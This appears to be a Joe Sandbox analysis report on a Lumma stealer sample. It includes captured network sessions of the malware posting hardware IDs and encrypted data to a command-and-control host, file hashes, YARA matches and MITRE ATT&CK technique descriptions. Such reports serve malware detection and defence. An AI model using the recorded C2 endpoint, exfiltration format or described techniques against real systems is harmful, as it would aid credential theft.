Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49698	172.67.146.208	443	7972	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-25 06:55:29 UTC	280	OUT	POST /hmand HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0ttOGt3jSY6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 589138 Host: digilayerx.digital
2025-04-25 06:55:29 UTC	15331	OUT	Data Raw: 2d 2d 30 74 74 4f 47 74 33 6a 53 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 62 30 65 34 63 66 66 35 64 66 66 39 33 35 64 34 33 31 31 62 39 65 30 32 34 31 30 39 66 37 38 33 61 62 38 63 0d 0a 2d 2d 30 74 74 4f 47 74 33 6a 53 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 74 74 4f 47 74 33 6a 53 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 38 45 33 35 44 36 33 39 35 41 38 36 38 44 33 44 44 33 30 30 38 46 38 34 44 42 33 34 Data Ascii: --0ttOGt3jSY6Content-Disposition: form-data; name="uid"b0e4cff5dff935d4311b9e024109f783ab8c--0ttOGt3jSY6Content-Disposition: form-data; name="pid"1--0ttOGt3jSY6Content-Disposition: form-data; name="hwid"7C8E35D6395A868D3DD3008F84DB34
2025-04-25 06:55:29 UTC	15331	OUT	Data Raw: f9 cd 1b 1d 85 bd e0 75 21 75 36 9b a2 89 d0 4a 02 52 31 af 7a c5 79 36 61 da 05 35 66 87 bd 0b c9 7b 1f 85 1f 3f 29 91 b6 e3 2b 88 d4 a9 2b 28 30 f0 c1 44 37 24 c1 7f 7a 4f 16 7a 9d fe c8 4e b7 32 03 83 4e a2 63 63 b0 07 49 49 66 66 b5 32 e4 e0 ef f3 ec 86 d6 d5 28 ac 4f b6 96 ac e9 99 14 ab 0f c8 9e 68 b4 3a cd 2b 72 18 ea 01 15 77 97 a1 c1 f3 f6 de d6 84 43 63 a3 e2 6e 44 60 ca cc bc 1a 98 37 c5 0d 22 ff e9 f4 f4 8c 94 55 18 ee 6b cd 80 5b 3d d3 e8 79 cc 2d da 8b f8 f0 b1 cc 3b fa 6d d7 1a 49 5b e5 64 e0 01 d8 a5 3d 17 0e 5d 08 7e 3a 26 9f 68 0d b4 22 22 69 67 08 a0 27 13 6a 7d 14 0b ad 8e 6a ce e1 9d cc 14 cc 9b 79 df 28 93 40 1d 39 ed d6 e6 00 b2 11 2c 24 b4 2a 6e b0 d4 78 31 29 3f 8d b0 dc 03 42 c0 d3 95 f2 33 63 bd ac 60 fb bf 1d ab 0d 37 43 a3 34 Data Ascii: u!u6JR1zy6a5f{?)++(0D7$zOzN2NccIIff2(Oh:+rwCcnD`7"Uk[=y-;mI[d=]~:&h""ig'j}jy(@9,$*nx1)?B3c`7C4
2025-04-25 06:55:29 UTC	15331	OUT	Data Raw: 9f e1 6a f7 ac 57 0e 39 d7 63 2d 95 e9 d6 74 f8 10 05 61 dd 90 29 d1 5a 60 fb bb 53 69 32 2f 3c 29 db f0 4f f9 14 d3 28 ac b2 cc ea a1 f5 01 49 7e f6 75 db 10 33 cf b2 42 30 79 fe e2 0f 1a 79 0c 82 95 2f 0d 4d e8 9b e6 d5 e8 0d da 48 9a f0 c0 9e 88 a4 da 15 2d 32 80 b5 d3 ee d0 59 e1 8e bb 15 e5 db 14 95 03 13 0c ee b1 41 f1 0a 21 f3 bc a0 d4 20 e8 ed 8b 71 39 dc d7 20 8a 02 dd 05 a4 b1 25 3b 9f fe 0c 28 5e cf 6e 4e e2 ae c0 33 3c f1 ec 93 ab 7e 41 04 2c 8d 55 fe 6f a3 8f 4d fa 99 c4 1d 07 b6 03 e0 b6 d9 70 b0 19 35 09 a1 f9 22 be c5 6d 5c 35 63 38 4a ea 6a 3a 99 eb a2 cc 39 7a 65 f9 14 c7 cf b3 4a de b7 06 8f 2b 01 a0 7a c7 b7 c6 61 34 c2 3e 0e f0 a5 e5 77 33 89 75 62 1f 95 94 fa af fb 53 ea 3b 2e 9e 47 65 22 78 ab 93 bd d5 69 63 8a cc 58 ce 32 db e1 b3 Data Ascii: jW9c-ta)Z`Si2/<)O(I~u3B0yy/MH-2YA! q9 %;(^nN3<~A,UoMp5"m\5c8Jj:9zeJ+za4>w3ubS;.Ge"xicX2
2025-04-25 06:55:29 UTC	15331	OUT	Data Raw: a5 a4 37 7d e2 3f 70 bd 88 79 00 62 2d a0 f9 b6 9c c7 13 44 ab 43 75 33 07 23 29 56 57 89 de ae 38 a5 33 d9 8c e9 d5 e0 f4 e9 6d 32 9f 7d 43 ea 27 23 df ac 43 1c 27 41 f4 60 ab 77 20 28 53 cb f7 ec 2b 60 1a 85 e3 d1 36 60 d1 fc 5e 65 32 a6 56 c6 cc 24 68 22 94 5f b2 7e bb c4 ae 2d fb df c0 44 db df 75 aa 77 36 5b 95 ae f8 17 e2 49 43 c4 29 81 54 a4 21 22 7e 09 dc 50 a3 5d 7c d1 61 76 ae c0 cd 44 1f 88 fd 29 e2 49 de cb 8d 94 2b d7 35 61 02 66 0d 5c 87 95 ed d9 43 bb fd a4 5c ae f8 0c af b1 88 e3 01 0e 39 5c 36 a6 3f 85 97 26 f1 7d 1a 17 08 74 36 cf 31 03 83 64 e5 7a 37 09 b4 38 e0 2b 1f ab 3c ca 5d cd a9 01 f0 b4 5d f4 ed f1 e3 2c f1 66 57 c0 50 10 e8 cf 5f 86 5f b0 75 e0 91 22 73 38 d6 81 50 12 3a 3a 87 97 fd a7 7e b5 dc 35 fd 68 fa c1 83 5d 67 39 84 58 Data Ascii: 7}?pyb-DCu3#)VW83m2}C'#C'A`w (S+`6`^e2V$h"_~-Duw6[IC)T!"~P]\|avD)I+5af\C\9\6?&}t61dz78+<]],fWP__u"s8P::~5h]g9X
2025-04-25 06:55:29 UTC	15331	OUT	Data Raw: 8c ac 2d 9e 8a b0 4a 04 e0 ce 03 f8 0e 60 82 61 2d 79 48 b3 06 7e 68 fb 82 3b ed 50 2f 45 5d 8f bb b6 65 03 30 db 30 2f 74 21 20 d7 0c 2b 76 b5 9d eb f2 83 c0 09 23 7d 89 8c ce 5a 4d 9d 51 30 26 8d ed 0d 48 f5 7f 56 0b bb 72 80 03 ea 9d 73 97 ad 8b 1d 6d da 87 07 09 c5 00 94 51 4f 94 ea 30 08 91 67 e1 28 95 dd c2 47 47 01 2e b3 d6 d1 ba de aa c1 30 7e 7d 05 d5 e6 4e 5f fd 75 06 6d ae ac a3 de 52 d2 6e 21 26 66 c9 e4 07 67 1f a2 14 d8 0b ff 0d 04 59 0a 48 2e dd bc a2 0c 1d b9 cc 49 20 87 4b ab 40 45 ca 0d 9a 09 34 9d b2 33 a3 e7 56 0a 50 79 74 b3 1f 9b 7f a7 5c c0 b4 a8 5a 54 13 1b 06 dd 22 d9 ca 36 ed 79 de f6 c8 03 24 99 6f 1e 14 0d 04 ed 7a 46 ec fd f7 48 da e9 7f 3f 88 31 23 8a 81 e8 69 04 c8 d6 29 72 1a d5 79 88 87 16 f6 9d d9 74 94 ac 36 12 b8 af a0 Data Ascii: -J`a-yH~h;P/E]e00/t! +v#}ZMQ0&HVrsmQO0g(GG.0~}N_umRn!&fgYH.I K@E43VPyt\ZT"6y$ozFH?1#i)ryt6
2025-04-25 06:55:29 UTC	15331	OUT	Data Raw: ba ee 4f 89 8f 95 4d ae e4 f4 7d 82 31 7e f9 0d 7c 36 95 d0 fb 26 ab e5 4d ea 8a 75 d7 2f ab df 07 c8 9c 63 32 3c 08 e5 e1 dc 8b 81 2c d3 da 0c 62 2c 45 18 f1 a9 76 f3 a6 d6 3b 5c 6c a8 1d e1 bd c0 72 c2 bc 9f a7 50 1f 6f 15 61 75 e0 09 71 88 32 0a 5e ff 75 31 c7 49 11 32 10 ff 5f bd 29 77 40 a6 16 cc de 84 13 84 07 98 b2 01 11 41 77 10 5d b0 52 92 0a f1 f8 ca 8b f6 96 e0 d3 83 41 96 63 cf b3 ec 0d e4 30 da 0d 15 07 d0 27 1e be 48 45 37 c2 f4 f1 06 cb 28 33 da a9 f1 c3 d3 e1 d8 ff 3e f1 0d 02 68 6e 2f a0 e0 fe 5c 1e d1 fe 39 73 87 7e 37 59 60 66 9c f2 17 e2 0e 0e 18 a4 35 ea a5 79 54 aa bc 30 94 99 c7 d4 50 52 df 94 99 ae b7 71 89 00 5e db e7 f5 8d 11 c1 a0 a8 26 7a bf 72 6a 6d 10 32 df 38 80 14 12 c8 64 3d 85 21 00 c1 28 64 73 02 c6 1e 52 54 80 09 9e da Data Ascii: OM}1~\|6&Mu/c2<,b,Ev;\lrPoauq2^u1I2_)w@Aw]RAc0'HE7(3>hn/\9s~7Y`f5yT0PRq^&zrjm28d=!(dsRT
2025-04-25 06:55:29 UTC	15331	OUT	Data Raw: 0f 8d af b7 6e fd c0 f5 2e 29 b8 92 c4 ec 6e 94 30 50 ce 10 72 ba 7e ac fc 9f 2f 19 4a d3 3b 86 bf 2f 7d 24 a1 70 c2 57 71 bf d5 6e 4b b7 69 ea 52 a4 17 54 7d 89 1f 76 58 2b 2d 3c 8e eb 08 d0 75 67 41 9d 31 80 e5 a2 23 42 72 ae 90 1a 8b 4b 23 b4 2d 50 9b d8 df 39 32 40 30 55 04 1f 5f 1d 6a 0e 0a 77 93 12 dc 34 54 4a 1a 40 eb 24 d8 13 f8 3b 15 75 a5 0f c7 ec c5 3f 80 83 08 66 1d a9 a6 6c 05 31 b2 5d 39 3a 65 46 45 42 b3 6b 94 51 e0 8c cb 31 bb 99 be e2 78 63 a6 8a 18 49 c9 ca 82 66 56 fb 36 74 cb 78 6f f0 18 5a a0 34 b6 7b 4e cb fe 13 b5 f5 8e 44 5c 5e 0c cb 86 11 76 25 c5 e5 58 84 c2 28 ab f3 62 f1 40 07 c1 87 c3 00 be f6 d6 5b f4 b2 06 5c 81 91 f5 5c 43 01 1a a5 ae e2 0d 6e 2c ad dd 95 f8 7f 54 d0 2b 36 46 7b d7 90 98 18 d0 6e 88 08 46 42 c4 76 5c 93 ea Data Ascii: n.)n0Pr~/J;/}$pWqnKiRT}vX+-<ugA1#BrK#-P92@0U_jw4TJ@$;u?fl1]9:eFEBkQ1xcIfV6txoZ4{ND\^v%X(b@[\\Cn,T+6F{nFBv\
2025-04-25 06:55:29 UTC	15331	OUT	Data Raw: bd f5 a0 fa b0 3b de 2b 83 6a 45 89 94 c8 7b d7 33 0b c8 be d9 bc e9 72 d6 0c c5 f8 51 ae 75 eb c6 1a 83 56 86 87 9e 42 0d 8f a6 65 ce 9e ec d8 75 73 57 19 f7 d4 46 6e db 3a d9 4b d9 39 99 2c d0 61 50 d4 e8 10 23 a5 97 58 56 f9 8c ae 15 b6 c7 2b ef 70 bd d5 f0 60 d4 11 8a f8 5e da c4 18 2a b6 c2 b3 fc 34 72 01 9c ad 8c af 48 51 65 a5 21 24 a8 14 95 47 f1 df 02 b9 23 ef ee df 7d 9b 33 51 2b f0 6e 57 f0 6c 83 7c bc 02 fc fb 37 1c 1c 44 f6 9a a2 d2 80 5e d4 b4 95 e9 94 20 63 86 98 87 c5 28 8f bc cc b5 02 f8 70 00 3e 7b 27 fd bd 8b d6 50 7e 63 2d 45 95 5a 53 95 a2 f0 f7 f5 41 05 39 a5 01 8e 4e df 76 11 74 fd 74 01 48 92 74 12 91 43 15 f3 35 d4 48 21 df a2 c7 64 31 30 fd 91 00 b3 c9 6a ff f7 0e 4d ae 21 6e 4e af 82 06 d8 5f 39 ae 56 23 7d 96 a7 d4 c3 7a 40 b1 Data Ascii: ;+jE{3rQuVBeusWFn:K9,aP#XV+p`^*4rHQe!$G#}3Q+nWl\|7D^ c(p>{'P~c-EZSA9NvttHtC5H!d10jM!nN_9V#}z@
2025-04-25 06:55:29 UTC	15331	OUT	Data Raw: 2e 52 3e 45 2a 56 fb 09 c8 e4 e8 e8 5b 00 c7 2f 6d 61 63 f6 2a 66 54 e6 5a eb 54 62 cd 9f 81 c7 eb f5 42 60 3d b0 bc 64 15 4a 18 e7 5d 7a b8 58 28 30 65 cf 45 09 4c 22 90 4b 70 03 47 ef fd 8b 59 44 b9 f0 de 29 1d d1 51 38 0a d0 e6 bd 28 2e 6b 5d 70 bd c6 09 2e 8c c6 1c 72 4b 61 d8 97 d8 39 99 0d 90 6b ab a9 4f 4e 9d eb 43 11 97 b0 9c fa 09 f8 95 6c aa 14 e4 53 29 9e f1 7a 71 af 35 8f 4f 60 e1 9e 60 35 eb 7e 86 ba 20 35 50 b0 b5 8a 08 ee 4b 18 f4 6e 03 02 6e 12 6b 35 61 5b 4d be 46 0e 4e b3 b2 17 bd a7 3f 6a ec e9 22 cf 3e 7b ed 31 fb 5c b9 8f 06 39 95 56 e5 97 9a 55 0c 72 c9 1e 75 50 ad 10 20 27 cc cf 69 63 df b6 ae 1a 0d f5 a3 ca 5f ed eb 76 46 97 a0 0e 2c 72 a8 b9 aa 39 44 0c 1a b6 3c bb fa 0a f0 4f b5 a0 c6 eb 4b 03 db 54 4c 4b 62 90 db 79 ca 43 b0 2a Data Ascii: .R>EV[/macfTZTbB`=dJ]zX(0eEL"KpGYD)Q8(.k]p.rKa9kONClS)zq5O``5~ 5PKnnk5a[MFN?j">{1\9VUruP 'ic_vF,r9D<OKTLKbyC*
2025-04-25 06:55:29 UTC	15331	OUT	Data Raw: 73 42 a1 4a 9e ff 99 98 06 34 4b 0a e8 97 03 be 4a e5 ec 47 74 a0 ff ae ae c9 7f 54 be bd 29 dd 64 2e f5 5b ff 62 ae b6 52 d5 73 ce 8d 6c e1 2b 6c bf 81 43 cd b8 e9 11 43 a1 95 e1 82 9a af 15 c8 09 6c df 2a 71 25 51 41 a8 ae 6e 1a 6d 3e d8 12 99 50 87 8e c7 75 04 8a 05 83 6d b1 a6 4e 95 d2 30 f1 5a c6 f7 6e 05 f3 00 e3 62 81 d5 41 04 ce 53 7f 91 6e 90 19 ed 30 53 c8 6d f3 3f d4 a1 d1 db 4f 0c 53 40 52 f3 d0 1d 8e 5b 3f 41 fd 5f f3 d9 af c6 8e 7d 20 6e b8 4c 6a 33 56 6b 4b 4a 60 b5 9f 32 95 30 cf b6 a6 41 13 93 aa 25 54 27 b5 f4 4a 19 81 44 03 c7 c3 35 9f 9d c8 41 43 69 e7 ce 23 00 04 bb 80 63 5b 2b be b2 68 49 9a ba b8 0e d8 4e d0 74 c4 61 65 b4 d0 30 eb bb af cd e5 44 ed 7a 7a 8e f6 24 a9 da 8a c2 06 6e fe 61 1d 64 30 52 ae 4e 59 95 22 14 f3 9c 6e 11 ba Data Ascii: sBJ4KJGtT)d.[bRsl+lCCl*q%QAnm>PumN0ZnbASn0Sm?OS@R[?A_} nLj3VkKJ`20A%T'JD5ACi#c[+hINtae0Dzz$nad0RNY"n
2025-04-25 06:55:31 UTC	264	IN	HTTP/1.1 200 OK Date: Fri, 25 Apr 2025 06:55:31 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Server: cloudflare Vary: Accept-Encoding Cf-Cache-Status: DYNAMIC CF-RAY: 935bef619f41d984-PHX alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49699	172.67.146.208	443	7972	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-25 06:55:32 UTC	268	OUT	POST /hmand HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 83 Host: digilayerx.digital
2025-04-25 06:55:32 UTC	83	OUT	Data Raw: 75 69 64 3d 62 30 65 34 63 66 66 35 64 66 66 39 33 35 64 34 33 31 31 62 39 65 30 32 34 31 30 39 66 37 38 33 61 62 38 63 26 63 69 64 3d 26 68 77 69 64 3d 37 43 38 45 33 35 44 36 33 39 35 41 38 36 38 44 33 44 44 33 30 30 38 46 38 34 44 42 33 34 46 41 Data Ascii: uid=b0e4cff5dff935d4311b9e024109f783ab8c&cid=&hwid=7C8E35D6395A868D3DD3008F84DB34FA
2025-04-25 06:55:32 UTC	241	IN	HTTP/1.1 200 OK Date: Fri, 25 Apr 2025 06:55:32 GMT Content-Type: application/octet-stream Content-Length: 43 Connection: close Server: cloudflare Cf-Cache-Status: DYNAMIC CF-RAY: 935bef73bae85011-PHX alt-svc: h3=":443"; ma=86400
2025-04-25 06:55:32 UTC	43	IN	Data Raw: 9f fc 7b 5a d8 cd 9b 14 53 75 b8 e6 42 99 2e 87 cd 2d fd f3 12 6f e0 9c 27 94 6e 0f bd 52 d0 f4 5c 97 9f 16 05 84 f2 9e e4 77 cb Data Ascii: {ZSuB.-o'nR\w

Statistics

CPU Usage

• SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Click to jump to process

Memory Usage

• SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Target ID:	0
Start time:	02:55:16
Start date:	25/04/2025
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe"
Imagebase:	0x9e0000
File size:	1'300'480 bytes
MD5 hash:	1B88C863822E876C446546C9DE795F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1409033013.0000000003C04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

Windows Analysis Report
SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe